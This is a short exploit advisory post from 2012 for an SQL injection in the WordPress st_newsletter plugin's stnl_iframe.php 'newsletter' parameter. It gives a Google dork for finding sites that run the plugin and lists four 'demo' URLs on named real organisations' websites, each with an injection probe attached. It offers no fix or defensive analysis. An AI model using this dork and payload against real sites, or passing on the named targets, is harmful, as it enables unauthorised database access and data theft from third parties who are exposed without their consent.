Home / exploits WordPress st_newsletter SQL Injection
Posted on 27 November 2012
# Exploit Title: Wordpress st_newsletter theme SQL injection # # Google Dork: inurl : inurl:/wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter= # # Date: 2012-25-11 # Exploit Author: Ashiyane Digital Security Team # # Discovered by : Amirh03in # # Tested on: Linux # # Security Risk : High - SQL Injection # =================================== =================================== # Location: http://site.com/wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=[SQL] # # Demo : http://preventcancernow.ca/wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=7%27 # http://www.sea-alarm.org/wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=15%27 # http://www.probono.cl/wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=10%27 # http://www.ukprogressive.co.uk/wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=133%27 # ======================================= ======================================= Greetz to: My Lord ALLAH =======================================
